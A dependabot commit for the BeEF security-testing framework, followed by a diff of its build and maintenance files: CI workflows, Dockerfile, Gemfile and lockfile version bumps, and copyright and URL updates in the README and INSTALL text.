Build(deps): bump rubocop from 1.85.0 to 1.85.1

Bumps [rubocop](https://github.com/rubocop/rubocop) from 1.85.0 to 1.85.1.
- [Release notes](https://github.com/rubocop/rubocop/releases)
- [Changelog](https://github.com/rubocop/rubocop/blob/master/CHANGELOG.md)
- [Commits](https://github.com/rubocop/rubocop/compare/v1.85.0...v1.85.1)

---
updated-dependencies:
- dependency-name: rubocop
  dependency-version: 1.85.1
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>

.github/ISSUE_TEMPLATE/bug_report.md

@@ -1,3 +1,8 @@
+---
+name: Bug report
+about: Report a bug to help us improve BeEF
+---
+
 ## First Steps
 
 1. Confirm that your issue has not been posted previously by searching here: https://github.com/beefproject/beef/issues
@@ -26,6 +31,7 @@
 2. Update `client_debug` to `true`
 3. Retrieve browser logs from your browser's developer console (Ctrl + Shift + I or F12 depending on browser)
 4. Retrieve your server-side logs from `~/.beef/beef.log`
-   * If using **beef-xss** logs found with `journalctl -u beef-xss`
+   * If you have a kali (beef-xss) problem, you can submit a bug here:
+     https://www.kali.org/docs/community/submitting-issues-kali-bug-tracker/
 
 **If we request additional information and we don't hear back from you within a week, we will be closing the ticket off.**

.github/ISSUE_TEMPLATE/config.yml

@@ -0,0 +1,5 @@
+blank_issues_enabled: false
+contact_links:
+  - name: Questions / Support
+    url: https://github.com/beefproject/beef/wiki
+    about: Please check the wiki before opening an issue.

.github/workflows/dependabot-auto-merge.yml

@@ -0,0 +1,26 @@
+name: Dependabot auto-merge
+on: 
+  pull_request:
+    branches:
+        - master
+
+permissions:
+  contents: write
+  pull-requests: write
+
+jobs:
+  dependabot:
+    runs-on: ubuntu-latest
+    if: github.event.pull_request.user.login == 'dependabot[bot]' && github.repository == 'beefproject/beef'
+    steps:
+      - name: Dependabot metadata
+        id: metadata
+        uses: dependabot/fetch-metadata@v2
+        with:
+          github-token: "${{ secrets.GITHUB_TOKEN }}"
+      - name: Enable auto-merge for Dependabot PRs
+        if: success() && (steps.metadata.outputs.update-type == 'version-update:semver-minor' || steps.metadata.outputs.update-type == 'version-update:semver-patch')
+        run: gh pr merge --auto --merge "$PR_URL"
+        env:
+          PR_URL: ${{ github.event.pull_request.html_url }}
+          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}

.github/workflows/github_actions.yml

@@ -3,24 +3,28 @@ name: 'BrowserStack Test'
 on:
   pull_request_target:
     branches: [ master ]
-      
-jobs:
-  approve:
-    runs-on: ubuntu-latest
+    types: [ labeled ]
 
-    steps:
-    - name: Approve
-      run: echo For security reasons, all pull requests need to be approved first before running any automated CI.
-      
+jobs:
   ubuntu-job:
     name: 'BrowserStack Test on Ubuntu'
-    runs-on: ubuntu-latest  # Can be self-hosted runner also
-    environment:
-      name: Integrate Pull Request
-    env: 
+    runs-on: ubuntu-latest
+    if: github.event.label.name == 'safe_to_test'
+    env:
       GITACTIONS: true
     steps:
 
+      - name: 'Remove safe_to_test label'
+        uses: actions/github-script@v8
+        with:
+          script: |
+            await github.rest.issues.removeLabel({
+              owner: context.repo.owner,
+              repo: context.repo.repo,
+              issue_number: context.payload.pull_request.number,
+              name: 'safe_to_test'
+            });
+
       - name: 'BrowserStack Env Setup'  # Invokes the setup-env action
         uses: browserstack/github-actions/setup-env@master
         with:
@@ -34,25 +38,26 @@ jobs:
           local-identifier: random
 
       - name: 'Checkout the repository'
-        uses: actions/checkout@v2
+        uses: actions/checkout@v6
         with:
           ref: ${{ github.event.pull_request.head.sha }}
           fetch-depth: 2
 
       - name: 'Setting up Ruby'
         uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: 3.0.3 # Not needed with a .ruby-version file
+        # Ruby version is defined in .ruby-version file
 
-      - name: 'Update and Install Dwpendencies'
+      - name: 'Update and Install Dependencies'
         run: |
           sudo apt update
           sudo apt install libcurl4 libcurl4-openssl-dev
+
       - name: 'Configure Bundle testing and install gems'
         run: |
           bundle config unset --local without
           bundle config set --local with 'test' 'development'
           bundle install
+
       - name: 'Run BrowserStack simple verification'
         run: |
           bundle exec rake browserstack --trace
@@ -60,4 +65,4 @@ jobs:
       - name: 'BrowserStackLocal Stop'  # Terminating the BrowserStackLocal tunnel connection
         uses: browserstack/github-actions/setup-local@master
         with:
-          local-testing: stop
+          local-testing: stop

.github/workflows/stale.yml

@@ -18,18 +18,18 @@ jobs:
       pull-requests: write
 
     steps:
-    - uses: actions/stale@v5
+    - uses: actions/stale@28ca1036281a5e5922ead5184a1bbf96e5fc984e # v10.0.0
       with:
         repo-token: ${{ secrets.GITHUB_TOKEN }}
-        days-before-stale: 7
-        days-before-pr-stale: 14
+        days-before-stale: 120
+        days-before-pr-stale: 29
         days-before-close: 7
-        days-before-pr-close: 14
-        stale-issue-message: 'This issue as been marked as stale due to inactivity and will be closed in 7 days'
+        days-before-pr-close: 31
+        stale-issue-message: 'This issue has been marked as stale due to inactivity and will be closed in 7 days'
         stale-pr-message: 'Stale pull request message'
         stale-issue-label: 'Stale'
         stale-pr-label: 'no-pr-activity'
         exempt-issue-labels: 'Critical, High, Low, Medium, Review, Backlog'
-        exempt-milestones: true
+        exempt-all-milestones: true
         exempt-draft-pr: true
-        start-date: '2022-06-15'
+        start-date: '2022-06-15T00:00:00Z'

.gitignore

@@ -1,5 +1,7 @@
 ### BeEF ###
 beef.db
+beef.db-shm
+beef.db-wal
 beef.log
 test/msf-test
 extensions/admin_ui/media/javascript-min/
@@ -25,6 +27,9 @@ coverage/
 # BrowserStack
 local.log
 
+# Visual Studio Code
+.vscode/
+
 # The following lines were created by https://www.gitignore.io
 
 ### Linux ###
@@ -126,3 +131,6 @@ node_modules/
 # Generated files
 out/
 doc/rdoc/
+
+# Secrets for testing github actions locally
+.secrets

.rubocop.yml

@@ -4,7 +4,7 @@ AllCops:
     - 'tmp/**/*'
     - 'tools/**/*'
     - 'doc/**/*'
-  TargetRubyVersion: 3.0
+  TargetRubyVersion: <%= File.read(".ruby-version").strip[/^(\d+\.\d+)/, 1] || raise("Ruby version not found") %>
   NewCops: enable
 
 Layout/LineLength:

.ruby-version

@@ -1 +1 @@
-3.0.3
+3.4.7

Dockerfile

@@ -1,3 +1,8 @@
+#
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
 ###########################################################################################################
 ###########################################################################################################
 ##                                                                                                       ##
@@ -10,7 +15,7 @@
 ###########################################################################################################
 
 # ---------------------------- Start of Builder 0 - Gemset Build ------------------------------------------
-FROM ruby:3.2.1-slim-bullseye AS builder
+FROM ruby:3.4.7-slim-bookworm AS builder
 
 COPY . /beef
 
@@ -22,11 +27,14 @@ RUN echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
  && apt-get install -y --no-install-recommends \
     git \
     curl \
+    libssl-dev \
     xz-utils \
+    pkg-config \
     make \
     g++ \
     libcurl4-openssl-dev \
     ruby-dev \
+    libyaml-dev \
     libffi-dev \
     zlib1g-dev \
     libsqlite3-dev \
@@ -39,7 +47,7 @@ RUN echo "gem: --no-ri --no-rdoc" > /etc/gemrc \
 
 
 # ---------------------------- Start of Builder 1 - Final Build ------------------------------------------
-FROM ruby:3.2.1-slim-bullseye
+FROM ruby:3.4.7-slim-bookworm
 LABEL maintainer="Beef Project" \
       source_url="github.com/beefproject/beef" \
       homepage="https://beefproject.com/"
@@ -56,8 +64,10 @@ RUN adduser --home /beef --gecos beef --disabled-password beef \
  && apt-get update \
  && apt-get install -y --no-install-recommends \
     curl \
+    wget \
+    espeak \
+    lame \
     openssl \
-    libssl-dev \
     libreadline-dev \
     libyaml-dev \
     libxml2-dev \
@@ -68,9 +78,20 @@ RUN adduser --home /beef --gecos beef --disabled-password beef \
     zlib1g \
     bison \
     nodejs \
+    firefox-esr \
  && apt-get -y clean \
  && rm -rf /var/lib/apt/lists/*
 
+# Install geckodriver for Selenium tests
+# Pin version and verify checksum to mitigate supply chain attacks
+ENV GECKODRIVER_VERSION=v0.36.0
+ENV GECKODRIVER_SHA256=0bde38707eb0a686a20c6bd50f4adcc7d60d4f73c60eb83ee9e0db8f65823e04
+RUN wget -q "https://github.com/mozilla/geckodriver/releases/download/${GECKODRIVER_VERSION}/geckodriver-${GECKODRIVER_VERSION}-linux64.tar.gz" \
+ && echo "${GECKODRIVER_SHA256}  geckodriver-${GECKODRIVER_VERSION}-linux64.tar.gz" | sha256sum -c - \
+ && tar -xzf "geckodriver-${GECKODRIVER_VERSION}-linux64.tar.gz" -C /usr/local/bin \
+ && chmod +x /usr/local/bin/geckodriver \
+ && rm "geckodriver-${GECKODRIVER_VERSION}-linux64.tar.gz"
+
 # Use gemset created by the builder above
 COPY --chown=beef:beef . /beef
 COPY --from=builder /usr/local/bundle /usr/local/bundle

Gemfile

@@ -1,34 +1,34 @@
 #
-# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - https://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
-#gem 'simplecov', require: false, group: :test
 
 gem 'net-smtp', require: false
 gem 'json'
 
 gem 'eventmachine', '~> 1.2', '>= 1.2.7'
-gem 'thin', '~> 1.8'
-gem 'sinatra', '~> 3.0'
-gem 'rack', '~> 2.2'
-gem 'rack-protection', '~> 3.0.5'
+gem 'thin', '~> 2.0'
+gem 'sinatra', '~> 4.1'
+gem 'rack', '~> 3.2'
+gem 'rack-protection', '~> 4.2.1'
 gem 'em-websocket', '~> 0.5.3' # WebSocket support
 gem 'uglifier', '~> 4.2'
-gem 'mime-types', '~> 3.4', '>= 3.4.1'
-gem 'execjs', '~> 2.9'
+gem 'mime-types', '~> 3.7'
+gem 'execjs', '~> 2.10'
 gem 'ansi', '~> 1.5'
 gem 'term-ansicolor', :require => 'term/ansicolor'
-gem 'rubyzip', '~> 2.3'
+gem 'rubyzip', '~> 3.2'
 gem 'espeak-ruby', '~> 1.1.0' # Text-to-Voice
-gem 'rake', '~> 13.0'
-gem 'otr-activerecord', '~> 2.1', '>= 2.1.2'
-gem 'sqlite3', '~> 1.6'
-gem 'rubocop', '~> 1.56.3', require: false
+gem 'rake', '~> 13.3'
+gem 'activerecord', '~> 8.1'
+gem 'otr-activerecord', '~> 2.6.0'
+gem 'sqlite3', '~> 2.9'
+gem 'rubocop', '~> 1.85.1', require: false
 
 # Geolocation support
 group :geoip do
-  gem 'maxmind-db', '~> 1.1', '>= 1.1.1'
+  gem 'maxmind-db', '~> 1.4'
 end
 
 gem 'parseconfig', '~> 1.1', '>= 1.1.2'
@@ -50,8 +50,8 @@ end
 
 # DNS extension
 group :ext_dns do
-  gem 'async-dns', '~> 1.3'
-  gem 'async', '~> 1.31'
+  gem 'async-dns', '~> 1.4'
+  gem 'async', '~> 1.32'
 end
 
 # QRcode extension
@@ -61,30 +61,31 @@ end
 
 # For running unit tests
 group :test do
-    gem 'test-unit-full', '~> 0.0.5'
-    gem 'rspec', '~> 3.12'
-    gem 'rdoc', '~> 6.5'
-    gem 'browserstack-local', '~> 1.4'
+  gem 'simplecov', '~> 0.22'
+  gem 'test-unit-full', '~> 0.0.5'
+  gem 'rspec', '~> 3.13'
+  gem 'rdoc', '~> 7.2'
+  gem 'browserstack-local', '~> 1.4'
 
-    gem 'irb', '~> 1.8'
-    gem 'pry-byebug', '~> 3.10', '>= 3.10.1'
+  gem 'irb', '~> 1.17'
+  gem 'pry-byebug', '~> 3.12'
 
-    gem 'rest-client', '~> 2.1.0'
-    gem 'websocket-client-simple', '~> 0.6.1'
+  gem 'rest-client', '~> 2.1.0'
+  gem 'websocket-client-simple', '~> 0.6.1'
 
-    # curb gem requires curl libraries
-    # sudo apt-get install libcurl4-openssl-dev
-    gem 'curb', '~> 1.0', '>= 1.0.5'
+  # Note: curb gem requires curl libraries
+  # sudo apt-get install libcurl4-openssl-dev
+  gem 'curb', '~> 1.2'
 
-    # selenium-webdriver 3.x is incompatible with Firefox version 48 and prior
-    # gem 'selenium' # Requires old version of selenium which is no longer available
-    gem 'geckodriver-helper', '~> 0.24.0'
-    gem 'selenium-webdriver', '~> 4.12'
+  # Note: selenium-webdriver 3.x is incompatible with Firefox version 48 and prior
+  # gem 'selenium' # Requires old version of selenium which is no longer available
+  gem 'geckodriver-helper', '~> 0.24.0'
+  gem 'selenium-webdriver', '~> 4.41'
 
-    # nokogiri is needed by capybara which may require one of the below commands
-    # sudo apt-get install libxslt-dev libxml2-dev
-    # sudo port install libxml2 libxslt
-    gem 'capybara', '~> 3.39'
+  # Note: nokogiri is needed by capybara which may require one of the below commands
+  # sudo apt-get install libxslt-dev libxml2-dev
+  # sudo port install libxml2 libxslt
+  gem 'capybara', '~> 3.40'
 end
 
 source 'https://rubygems.org'

Gemfile.lock

@@ -1,191 +1,264 @@
 GEM
   remote: https://rubygems.org/
   specs:
-    activemodel (7.0.4.3)
-      activesupport (= 7.0.4.3)
-    activerecord (7.0.4.3)
-      activemodel (= 7.0.4.3)
-      activesupport (= 7.0.4.3)
-    activesupport (7.0.4.3)
-      concurrent-ruby (~> 1.0, >= 1.0.2)
+    activemodel (8.1.2)
+      activesupport (= 8.1.2)
+    activerecord (8.1.2)
+      activemodel (= 8.1.2)
+      activesupport (= 8.1.2)
+      timeout (>= 0.4.0)
+    activesupport (8.1.2)
+      base64
+      bigdecimal
+      concurrent-ruby (~> 1.0, >= 1.3.1)
+      connection_pool (>= 2.2.5)
+      drb
       i18n (>= 1.6, < 2)
+      json
+      logger (>= 1.4.2)
       minitest (>= 5.1)
-      tzinfo (~> 2.0)
-    addressable (2.8.4)
-      public_suffix (>= 2.0.2, < 6.0)
+      securerandom (>= 0.3)
+      tzinfo (~> 2.0, >= 2.0.5)
+      uri (>= 0.13.1)
+    addressable (2.8.9)
+      public_suffix (>= 2.0.2, < 8.0)
     ansi (1.5.0)
-    archive-zip (0.12.0)
-      io-like (~> 0.3.0)
-    ast (2.4.2)
-    async (1.31.0)
+    archive-zip (0.13.1)
+      io-like (~> 0.4.0)
+    ast (2.4.3)
+    async (1.32.1)
       console (~> 1.10)
       nio4r (~> 2.3)
       timers (~> 4.1)
-    async-dns (1.3.0)
-      async-io (~> 1.15)
-    async-io (1.34.3)
+    async-dns (1.4.1)
       async
-    base64 (0.1.1)
+      io-endpoint
+    base64 (0.3.0)
+    bigdecimal (4.0.1)
     browserstack-local (1.4.3)
-    byebug (11.1.3)
-    capybara (3.39.2)
+    byebug (13.0.0)
+      reline (>= 0.6.0)
+    capybara (3.40.0)
       addressable
       matrix
       mini_mime (>= 0.1.3)
-      nokogiri (~> 1.8)
+      nokogiri (~> 1.11)
       rack (>= 1.6.0)
       rack-test (>= 0.6.3)
       regexp_parser (>= 1.5, < 3.0)
       xpath (~> 3.2)
     coderay (1.1.3)
-    concurrent-ruby (1.2.2)
-    console (1.16.2)
-      fiber-local
-    curb (1.0.5)
+    concurrent-ruby (1.3.6)
+    connection_pool (3.0.2)
+    console (1.34.0)
+      fiber-annotation
+      fiber-local (~> 1.1)
+      json
+    curb (1.2.2)
     daemons (1.4.1)
-    diff-lcs (1.5.0)
-    domain_name (0.5.20190701)
-      unf (>= 0.0.5, < 1.0.0)
+    date (3.5.1)
+    diff-lcs (1.6.2)
+    docile (1.4.1)
+    domain_name (0.6.20240107)
+    drb (2.2.3)
     em-websocket (0.5.3)
       eventmachine (>= 0.12.9)
       http_parser.rb (~> 0)
+    erb (6.0.1)
     erubis (2.7.0)
     espeak-ruby (1.1.0)
     event_emitter (0.2.6)
     eventmachine (1.2.7)
-    execjs (2.9.1)
-    fiber-local (1.0.0)
+    execjs (2.10.0)
+    fiber-annotation (0.2.0)
+    fiber-local (1.1.0)
+      fiber-storage
+    fiber-storage (1.0.1)
     geckodriver-helper (0.24.0)
       archive-zip (~> 0.7)
-    hashie (5.0.0)
-    hashie-forbidden_attributes (0.1.1)
-      hashie (>= 3.0)
     http-accept (1.7.0)
-    http-cookie (1.0.5)
+    http-cookie (1.0.8)
       domain_name (~> 0.5)
     http_parser.rb (0.8.0)
-    i18n (1.12.0)
+    i18n (1.14.8)
       concurrent-ruby (~> 1.0)
-    io-console (0.6.0)
-    io-like (0.3.1)
-    irb (1.8.1)
-      rdoc
-      reline (>= 0.3.8)
-    json (2.6.3)
-    language_server-protocol (3.17.0.3)
-    matrix (0.4.2)
-    maxmind-db (1.1.1)
-    method_source (1.0.0)
-    mime-types (3.4.1)
-      mime-types-data (~> 3.2015)
-    mime-types-data (3.2023.0218.1)
-    mini_mime (1.1.2)
-    minitest (5.18.0)
-    mojo_magick (0.6.7)
+    io-console (0.8.2)
+    io-endpoint (0.15.2)
+    io-like (0.4.0)
+    irb (1.17.0)
+      pp (>= 0.6.0)
+      prism (>= 1.3.0)
+      rdoc (>= 4.0.0)
+      reline (>= 0.4.2)
+    json (2.18.1)
+    json-schema (6.1.0)
+      addressable (~> 2.8)
+      bigdecimal (>= 3.1, < 5)
+    language_server-protocol (3.17.0.5)
+    lint_roller (1.1.0)
+    logger (1.7.0)
+    matrix (0.4.3)
+    maxmind-db (1.4.0)
+    mcp (0.8.0)
+      json-schema (>= 4.1)
+    method_source (1.1.0)
+    mime-types (3.7.0)
+      logger
+      mime-types-data (~> 3.2025, >= 3.2025.0507)
+    mime-types-data (3.2025.0902)
+    mini_mime (1.1.5)
+    minitest (6.0.1)
+      prism (~> 1.5)
+    mojo_magick (0.6.8)
     msfrpc-client (1.1.2)
       msgpack (~> 1)
-    msgpack (1.6.1)
-    mustermann (3.0.0)
+    msgpack (1.8.0)
+    mustermann (3.0.4)
       ruby2_keywords (~> 0.0.1)
-    net-protocol (0.2.1)
+    net-protocol (0.2.2)
       timeout
-    net-smtp (0.4.0)
+    net-smtp (0.5.1)
       net-protocol
     netrc (0.11.0)
-    nio4r (2.5.8)
-    nokogiri (1.15.2-x86_64-linux)
+    nio4r (2.7.4)
+    nokogiri (1.19.1-aarch64-linux-gnu)
       racc (~> 1.4)
-    otr-activerecord (2.1.2)
-      activerecord (>= 4.0, < 7.1)
-      hashie-forbidden_attributes (~> 0.1)
-    parallel (1.23.0)
+    nokogiri (1.19.1-aarch64-linux-musl)
+      racc (~> 1.4)
+    nokogiri (1.19.1-arm-linux-gnu)
+      racc (~> 1.4)
+    nokogiri (1.19.1-arm-linux-musl)
+      racc (~> 1.4)
+    nokogiri (1.19.1-arm64-darwin)
+      racc (~> 1.4)
+    nokogiri (1.19.1-x86_64-darwin)
+      racc (~> 1.4)
+    nokogiri (1.19.1-x86_64-linux-gnu)
+      racc (~> 1.4)
+    nokogiri (1.19.1-x86_64-linux-musl)
+      racc (~> 1.4)
+    otr-activerecord (2.6.0)
+      activerecord (>= 6.0, < 9.0)
+    parallel (1.27.0)
     parseconfig (1.1.2)
-    parser (3.2.2.3)
+    parser (3.3.10.2)
       ast (~> 2.4.1)
       racc
-    power_assert (2.0.3)
-    pry (0.14.2)
+    power_assert (2.0.5)
+    pp (0.6.3)
+      prettyprint
+    prettyprint (0.2.0)
+    prism (1.9.0)
+    pry (0.16.0)
       coderay (~> 1.1)
       method_source (~> 1.0)
-    pry-byebug (3.10.1)
-      byebug (~> 11.0)
-      pry (>= 0.13, < 0.15)
-    psych (5.1.0)
+      reline (>= 0.6.0)
+    pry-byebug (3.12.0)
+      byebug (~> 13.0)
+      pry (>= 0.13, < 0.17)
+    psych (5.3.1)
+      date
       stringio
-    public_suffix (5.0.1)
-    qr4r (0.6.1)
+    public_suffix (7.0.5)
+    qr4r (0.6.2)
       mojo_magick (~> 0.6.5)
-      rqrcode_core (~> 0.1)
-    racc (1.7.1)
-    rack (2.2.7)
-    rack-protection (3.0.6)
-      rack
-    rack-test (2.1.0)
+      rqrcode_core (~> 1.0)
+    racc (1.8.1)
+    rack (3.2.5)
+    rack-protection (4.2.1)
+      base64 (>= 0.1.0)
+      logger (>= 1.6.0)
+      rack (>= 3.0.0, < 4)
+    rack-session (2.1.1)
+      base64 (>= 0.1.0)
+      rack (>= 3.0.0)
+    rack-test (2.2.0)
       rack (>= 1.3)
     rainbow (3.1.1)
-    rake (13.0.6)
-    rdoc (6.5.0)
+    rake (13.3.1)
+    rdoc (7.2.0)
+      erb
       psych (>= 4.0.0)
-    regexp_parser (2.8.1)
-    reline (0.3.8)
+      tsort
+    regexp_parser (2.11.3)
+    reline (0.6.3)
       io-console (~> 0.5)
     rest-client (2.1.0)
       http-accept (>= 1.7.0, < 2.0)
       http-cookie (>= 1.0.2, < 2.0)
       mime-types (>= 1.16, < 4.0)
       netrc (~> 0.8)
-    rexml (3.2.6)
-    rqrcode_core (0.2.0)
-    rr (3.1.0)
-    rspec (3.12.0)
-      rspec-core (~> 3.12.0)
-      rspec-expectations (~> 3.12.0)
-      rspec-mocks (~> 3.12.0)
-    rspec-core (3.12.1)
-      rspec-support (~> 3.12.0)
-    rspec-expectations (3.12.2)
+    rexml (3.4.4)
+    rqrcode_core (1.2.0)
+    rr (3.1.2)
+    rspec (3.13.2)
+      rspec-core (~> 3.13.0)
+      rspec-expectations (~> 3.13.0)
+      rspec-mocks (~> 3.13.0)
+    rspec-core (3.13.6)
+      rspec-support (~> 3.13.0)
+    rspec-expectations (3.13.5)
       diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.12.0)
-    rspec-mocks (3.12.4)
+      rspec-support (~> 3.13.0)
+    rspec-mocks (3.13.6)
       diff-lcs (>= 1.2.0, < 2.0)
-      rspec-support (~> 3.12.0)
-    rspec-support (3.12.0)
-    rubocop (1.56.3)
-      base64 (~> 0.1.1)
+      rspec-support (~> 3.13.0)
+    rspec-support (3.13.6)
+    rubocop (1.85.1)
       json (~> 2.3)
-      language_server-protocol (>= 3.17.0)
+      language_server-protocol (~> 3.17.0.2)
+      lint_roller (~> 1.1.0)
+      mcp (~> 0.6)
       parallel (~> 1.10)
-      parser (>= 3.2.2.3)
+      parser (>= 3.3.0.2)
       rainbow (>= 2.2.2, < 4.0)
-      regexp_parser (>= 1.8, < 3.0)
-      rexml (>= 3.2.5, < 4.0)
-      rubocop-ast (>= 1.28.1, < 2.0)
+      regexp_parser (>= 2.9.3, < 3.0)
+      rubocop-ast (>= 1.49.0, < 2.0)
       ruby-progressbar (~> 1.7)
-      unicode-display_width (>= 2.4.0, < 3.0)
-    rubocop-ast (1.29.0)
-      parser (>= 3.2.1.0)
+      unicode-display_width (>= 2.4.0, < 4.0)
+    rubocop-ast (1.49.0)
+      parser (>= 3.3.7.2)
+      prism (~> 1.7)
     ruby-progressbar (1.13.0)
     ruby2_keywords (0.0.5)
-    rubyzip (2.3.2)
+    rubyzip (3.2.2)
     rushover (0.3.0)
       json
       rest-client
-    selenium-webdriver (4.12.0)
+    securerandom (0.4.1)
+    selenium-webdriver (4.41.0)
+      base64 (~> 0.2)
+      logger (~> 1.4)
       rexml (~> 3.2, >= 3.2.5)
-      rubyzip (>= 1.2.2, < 3.0)
+      rubyzip (>= 1.2.2, < 4.0)
       websocket (~> 1.0)
-    sinatra (3.0.6)
+    simplecov (0.22.0)
+      docile (~> 1.1)
+      simplecov-html (~> 0.11)
+      simplecov_json_formatter (~> 0.1)
+    simplecov-html (0.13.2)
+    simplecov_json_formatter (0.1.4)
+    sinatra (4.2.1)
+      logger (>= 1.6.0)
       mustermann (~> 3.0)
-      rack (~> 2.2, >= 2.2.4)
-      rack-protection (= 3.0.6)
+      rack (>= 3.0.0, < 4)
+      rack-protection (= 4.2.1)
+      rack-session (>= 2.0.0, < 3)
       tilt (~> 2.0)
     slack-notifier (2.4.0)
-    sqlite3 (1.6.6-x86_64-linux)
-    stringio (3.0.5)
+    sqlite3 (2.9.0-aarch64-linux-gnu)
+    sqlite3 (2.9.0-aarch64-linux-musl)
+    sqlite3 (2.9.0-arm-linux-gnu)
+    sqlite3 (2.9.0-arm-linux-musl)
+    sqlite3 (2.9.0-arm64-darwin)
+    sqlite3 (2.9.0-x86_64-darwin)
+    sqlite3 (2.9.0-x86_64-linux-gnu)
+    sqlite3 (2.9.0-x86_64-linux-musl)
+    stringio (3.2.0)
     sync (0.5.0)
-    term-ansicolor (1.7.1)
-      tins (~> 1.0)
-    test-unit (3.5.7)
+    term-ansicolor (1.11.3)
+      tins (~> 1)
+    test-unit (3.7.0)
       power_assert
     test-unit-context (0.5.1)
       test-unit (>= 2.4.0)
@@ -202,78 +275,90 @@ GEM
       test-unit (>= 2.5.2)
     test-unit-runner-tap (1.1.2)
       test-unit
-    thin (1.8.2)
+    thin (2.0.1)
       daemons (~> 1.0, >= 1.0.9)
       eventmachine (~> 1.0, >= 1.0.4)
-      rack (>= 1, < 3)
-    tilt (2.1.0)
-    timeout (0.4.0)
-    timers (4.3.5)
-    tins (1.32.1)
+      logger
+      rack (>= 1, < 4)
+    tilt (2.6.1)
+    timeout (0.6.0)
+    timers (4.4.0)
+    tins (1.43.0)
+      bigdecimal
       sync
+    tsort (0.2.0)
     tzinfo (2.0.6)
       concurrent-ruby (~> 1.0)
-    uglifier (4.2.0)
+    uglifier (4.2.1)
       execjs (>= 0.3.0, < 3)
-    unf (0.1.4)
-      unf_ext
-    unf_ext (0.0.8.2)
-    unicode-display_width (2.4.2)
-    webrick (1.8.1)
-    websocket (1.2.9)
+    unicode-display_width (3.2.0)
+      unicode-emoji (~> 4.1)
+    unicode-emoji (4.2.0)
+    uri (1.1.1)
+    webrick (1.9.1)
+    websocket (1.2.11)
     websocket-client-simple (0.6.1)
       event_emitter
       websocket
-    xmlrpc (0.3.2)
+    xmlrpc (0.3.3)
       webrick
     xpath (3.2.0)
       nokogiri (~> 1.8)
 
 PLATFORMS
-  x86_64-linux
+  aarch64-linux-gnu
+  aarch64-linux-musl
+  arm-linux-gnu
+  arm-linux-musl
+  arm64-darwin
+  x86_64-darwin
+  x86_64-linux-gnu
+  x86_64-linux-musl
 
 DEPENDENCIES
+  activerecord (~> 8.1)
   ansi (~> 1.5)
-  async (~> 1.31)
-  async-dns (~> 1.3)
+  async (~> 1.32)
+  async-dns (~> 1.4)
   browserstack-local (~> 1.4)
-  capybara (~> 3.39)
-  curb (~> 1.0, >= 1.0.5)
+  capybara (~> 3.40)
+  curb (~> 1.2)
   em-websocket (~> 0.5.3)
   erubis (~> 2.7)
   espeak-ruby (~> 1.1.0)
   eventmachine (~> 1.2, >= 1.2.7)
-  execjs (~> 2.9)
+  execjs (~> 2.10)
   geckodriver-helper (~> 0.24.0)
-  irb (~> 1.8)
+  irb (~> 1.17)
   json
-  maxmind-db (~> 1.1, >= 1.1.1)
-  mime-types (~> 3.4, >= 3.4.1)
+  maxmind-db (~> 1.4)
+  mime-types (~> 3.7)
   msfrpc-client (~> 1.1, >= 1.1.2)
   net-smtp
-  otr-activerecord (~> 2.1, >= 2.1.2)
+  otr-activerecord (~> 2.6.0)
   parseconfig (~> 1.1, >= 1.1.2)
-  pry-byebug (~> 3.10, >= 3.10.1)
+  pry-byebug (~> 3.12)
   qr4r (~> 0.6.1)
-  rack (~> 2.2)
-  rack-protection (~> 3.0.5)
-  rake (~> 13.0)
-  rdoc (~> 6.5)
+  rack (~> 3.2)
+  rack-protection (~> 4.2.1)
+  rake (~> 13.3)
+  rdoc (~> 7.2)
   rest-client (~> 2.1.0)
-  rspec (~> 3.12)
-  rubocop (~> 1.56.3)
-  rubyzip (~> 2.3)
+  rspec (~> 3.13)
+  rubocop (~> 1.85.1)
+  rubyzip (~> 3.2)
   rushover (~> 0.3.0)
-  selenium-webdriver (~> 4.12)
-  sinatra (~> 3.0)
+  selenium-webdriver (~> 4.41)
+  simplecov (~> 0.22)
+  sinatra (~> 4.1)
   slack-notifier (~> 2.4)
-  sqlite3 (~> 1.6)
+  sqlite3 (~> 2.9)
   term-ansicolor
   test-unit-full (~> 0.0.5)
-  thin (~> 1.8)
+  thin (~> 2.0)
   uglifier (~> 4.2)
   websocket-client-simple (~> 0.6.1)
-  xmlrpc (~> 0.3.2)
+  xmlrpc (~> 0.3.3)
 
 BUNDLED WITH
-   2.4.8
+   2.7.2

INSTALL.txt

@@ -1,7 +1,7 @@
 ===============================================================================
    
-    Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - https://beefproject.com
     See the file 'doc/COPYING' for copying permission
 
 ===============================================================================
@@ -21,9 +21,9 @@ Or cloning the Git repository from Github:
 Prerequisites
 --------------
 
-BeEF requires Ruby 2.7+.
+BeEF requires Ruby 3.0+.
 
-If your operating system package manager does not support Ruby version 2.7,
+If your operating system package manager does not support Ruby version 3.0,
 you can add the brightbox ppa repository for the latest version of Ruby:
 
   $ sudo apt-add-repository -y ppa:brightbox/ruby-ng

README.md

@@ -1,7 +1,7 @@
 ===============================================================================
 
-    Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
-    Browser Exploitation Framework (BeEF) - http://beefproject.com
+    Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
+    Browser Exploitation Framework (BeEF) - https://beefproject.com
     See the file 'doc/COPYING' for copying permission
 
 ===============================================================================
@@ -30,13 +30,13 @@ __Security Bugs:__ security@beefproject.com
 
 __Twitter:__ [@beefproject](https://twitter.com/beefproject)
 
-__Discord:__ https://discord.gg/ugmKmHarKc
+__Discord:__ https://discord.gg/25wT2P8pwx
 
 Requirements
 ------------
 
 * Operating System: Mac OSX 10.5.0 or higher / modern Linux. Note: Windows is not supported.
-* [Ruby](https://www.ruby-lang.org): 2.7 or newer
